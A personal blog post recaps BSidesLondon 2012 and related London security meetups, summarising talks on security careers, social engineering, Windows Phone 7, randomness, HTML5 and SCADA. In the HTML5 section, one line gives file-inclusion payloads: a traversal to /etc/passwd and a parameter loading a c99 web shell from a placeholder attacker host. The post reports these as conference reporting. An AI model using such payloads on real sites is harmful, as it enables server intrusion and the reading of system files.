I’m back from a small trip to London where is happening some kind of a “security marathon” this week! In parallel to InfoSecurity Europe 2012, several “alternative” events where organized in the same area. However I did not visited InfoSecurity. I was present at the Benelux edition a few weeks ago and saw enough vendors/products (ties overflow). After a nice ride under the sea and having dropped my luggage at the hotel, I reached my first step: the Information Security Blogger Meetup. The pub was fully dedicated to people from InfoSecurity (sponsored by Firemon) and a space was reserved to the bloggers but not so many people present (although 40 people registered). It was a bit disappointing but, anyway, it was a good opportunity to meet Andrew & Kelly Hay and Javvad Malik. Thanks for the sponsor for the open bar! By the way, I missed Brian Honan with a bow tie! 😉
The next step was a few streets far away: the 44Café and DC4420 were organized in another pub, the “Troubadour”. There was much more people and an atmosphere close to the one of real security conferences (read: “beers and talks”). I came late and I was only able to watch the Adam Laurie‘s talk about the security of RF communications (based on 433Mhz frequency). More and more gadgets with RF interfaces, are found in our houses. A good example are the remote controls for electric devices (to turn them off/on via your sofa or bed). Most of those devices are made in China and do not implement any security control at all. Adam performed a nice demo. He sniffed the original RF signal using a specific dongle and the “rfcap” tool. The captured .wav file can be analyzed and replayed using the same device. And he successfully powered off/on the LED lamp on the stage. Awesome! Of course, this has a limited impact (a very low operational range) but… Once the DC4420 over, I went to an Italian restaurant with friends to continue discussions about security.
After a short night, let’s commute to the next step: BSidesLondon! This was the second edition. I won’t come back on the history of BSides conferences, here is a reminder. The conference moved to a new venue, the Barbican center, a very nice place!
First talk of the day was the one of Robin Wood (@digininja) about “Breaking in to security“. A few weeks ago, Robin asked to Infosec professional to answer a few questions about their career (via an online survey). The goal was to produce a definitive answer to people frequently asking “How to start a career in information security?“, “What programming language learn to become a pentester?” or “Which certification should I get?” First, it seems that people are not aware of the reality and media report often a bad idea of the “hackers”:
Some stats extracted from the survey:
- 43% of people who answered are active in information security for more than seven years
- Interesting job types: 33% reported being “log analyst” and 25% busy with “incident response”
- Do you need to be a programmer to pen test: no but it helps (62%), yes (26%). The goal of programs is to automate boring tasks.
- Which language are preferred? Top-3: python, bash, ruby
- Which Certs are useful? SANS/GIAC, CISSP, Offensive security (PWB, AWE, …)
- Is attending conference important: YES (88%)
- Which con? All of them had a mention 😉
Then a live interview (real case study) was performed with Wicked Clown. Don’t forget that security involves also dealing with people, public speaking, negotiation skills, writing report (boring ok!) and networking. Security conferences are a must to attend even if they are often bad for your liver! Have also a look at mailing lists, podcasts, forums. Don’t be afraid to ask questions and to learn. Today it’s easy to build a lab at home using virtualization. As a conclusion to this talk, only one word is important: “passion”! Remember: It cannot only be “a job”! Robin’s slides are already available here.
The second talk was about Social Engineering: “What is it & how is it done?” by Ian Maxted (@TheJeffVader). He started the presentation with an history of social engineering. Did you know that it started with a book published in 1946 (name). Then he reviewed several techniques to collect sensitive information. Classic places are smoking areas or coffee machine in companies or pubs! Of course, with the new “Y” generation, social networks are a great place to search for useful details to contact further attacks. Ian showed some examples of fake websites. Note that such interfaces are quite easy to build, even by script kiddies but it’s sometimes not easy to persuade the victim to visit them. That’s what makes social engineering interesting. The goal is to establish relationships! Great introduction!
Next, the security of Windows Phone 7 was analyzed by David Rook (@securityninja). As other systems, Windows Phone 7 will suffer of security issues. Why? Today, 31% of mobile devices are smartphones. And those devices are really useful when you install apps. Remember the slogan: “There is an app for that!“. And apps introduce vulnerabilities. The market share of Windows Phone 7 is today only 1.9% but it will grow in the coming years. After this introduction, David explained how apps are developed and are running. First, if you are a .Net developer, you are already a Windows Phone 7 develop! .Net is also used but in a compact framework for resource constrained devices. The applications run in a “CLR” (“Common Language Runtime” – some kind of Java VM) and cannot access restricted code. The security model is the following:
- Chambers concept to enforce app isolation and least privilege
- The chambers provide a security boundary to restrict the apps
- For chambers and apps runs in one of them
- 3 chambers have fixed permission sets
- 4th chamber is capabilities based
An interesting tool: Windows Phone App Analyzer 1.0
Note that all apps must be signed by Microsoft after reviewing process before being published on the Microsoft market. For the rest, the same features are used: application sandboxing, isolated storage. Security remains the same but think more about the root causes like input/output validation, error handling, etc. Robin’s Top-3 is: secure storage, authentication & access and privacy. Nothing really new, the same best practices must be implemented: Never store data locally if not needed. About encryption, Windows Phone 7 allows to encrypt data & databases, do it!
The next talk was not schedule (planning change?) but it was really interesting. Paco Hope talked about “randomness”. Where are random numbers used? In many fields: games (poker), gambling, lottery, casino but also in more “technical application” like SSL, filename generators etc. What’s important with randomness?
- The uniformity (no pattern)
- The forward security (can’t know previous values)
- The backward security (can’t know future values)
Developing a good random generator is not easy (as seen on xkcd.com). Plenty of mistakes can be done making the generator predictable (even if sometimes it’s not easy at all). Random numbers can be generated by hardware solutions (PCI cards, built-in chips on motherboards or USB dongle) but they also have vulnerabilities: environmental (temperature, voltage). And the throughput remains critical in some applications. About software solutions, common problems are where to gt the entropy, how often reseed occur, the period and seed size. Vulnerabilities are a disclosed seed or attacking the entropy sources. Some example of bad implementation: using the system time or a process ID. Paco showed examples of algorithm to shuffle cards. Very interesting!
Let’s continue with a good talk about HTML5 by Robert McArdle (@robmcardle). The next version of the HTML is more and more used and tested by web developers. It will introduce cool features but cool features sometimes say… security issues! The talk was divided in three parts: the good, the bad and the “???”
What’s cool with HTML5?
- HTML5 Canvas – 2D & 3D easy to make nice graphics and add more interaction with users. A good example is Quake2 demo in HTML5
- Embedding videos in pages is very easy as wall as the interaction with the users (pause, CSS)
- Geolocalisation (mainly on mobile devices) is possible in a few lines of codes
- Drag & Drop!
- Web notifications
But what’s bad?
- XSS attackes remain valid with new tags (“<video>”)
- XMLHTTPRequest() extends the local file inclusing problem! Instead of “http://site.com&page=../../../../etc/passwd“, we could see “page=http://www.evilsite.com/c99shell.php“
- Web notification coupled with social engineering could be evil! (pop-ups looking like the operating system ones)
Finally, the ???: A nice demo of a BitB (“BotNets in the Browser“) attack. Based on HTML5 code, it’s possible to perform DDoS attacks, to send spam, to geolocate the victim, grab information about his system. Awesome (depending on the point of view). Keep an eye on HTML5! For sure, it will become a nice platform to conduct attacks. Have a look at html5security.org for updates on this topic.
After the lunch, another talk about social engineering by Gavin Ewan (@jac0byterebel). “A salesman’s guide to social engineering” was really complimentary to the first one presented in the morning. The Gavin’s definition of social engineering is: “Hacking the human mind, bypassing the human IDS”. How? There are several channels: Face 2 face, telephone or online . Then Gavin focused on a comparison between a salesman and a social engineer. If you look close to their methods, they are very close to each other! Both recognize that each target (sale/attack) is different, they can play different roles, they use a variety of questioning techniques and recognize that “no” does not mean “no”. A really nice talk given with a Scottish humor! Great.
Then, the security of SCADA environments was reviewed by Amol Sarwate (@amolsarwate). After a review of the components used in a SCADA environment (I/O – remote – communication – master), Amol reviewed the threats that affect each components. Two protocols used in SCADA environment were reviewed: Modbus and DNP 3.0 (over TCP). (Did you know that Wireshark was able to decode them?). The main issues with those protocols: they don’t follow the CIA principle (no authentication, no encryption). What are common issues within SCADA environments?
- HMI (Human Machine Interfaces) are sometimes connected on corporate network or Internet
- Shared or simple passwords are used (what’s new in this world?)
- No patching policy and Windows systems
- Not restarted for years (will it boot again?)
- System long life cycle (often they are installed for a decade)
- Outdated techs
- SCADA administrators are not system administrators.
Note that no only SCADA systems (in industrial environments) are to blame but also medical systems (ex: imagery systems in hospitals). More precisely, it’s not the systems themselves (after all they do the job they have been developed for) to blame but more the way they are deployed and managed. To close the presentation, Amol presented the tool developed by Qualys: scandascan.pl (The first release if available here). It scans networks for SCADA devices responding to Modbus or DNP3. If you are looking for online (publicly available) SCADA devices, Shodan can be also a great tool.
My last choice was the presentation of Abraham Aranguren(@7a_) about his tool called “owtf” which stands for “Offensive Web Testing Framework“. After a short introduction why and how web app testing is important, Abraham explained his tool with multiple demos. Testing web applications is important. Did you know that 32 out of 66 OWASp tests can be performed legally (depending on the local laws – take care!). Abraham’s tool is available here. Unfortunately, I was not able to attend the end of his presentation as well as the last track due to travel constraints.
What else? In parallel to the two tracks, there was a third one left open for last-minute initiatives (with 15 minutes slots). I attended some of them which where interesting. Security researchers are doing a great job. As said Robin during his talk: security conferences and networking is a key point, so I did. This second edition of BSidesLondon was a great opportunity to meet new (and old) friends. Thanks to my new followers in Twitter. I think that London was never so full of infosec people! Kudos to the crew (especially to @geekchickuk!) and see you in 2013! May I already book my ticket?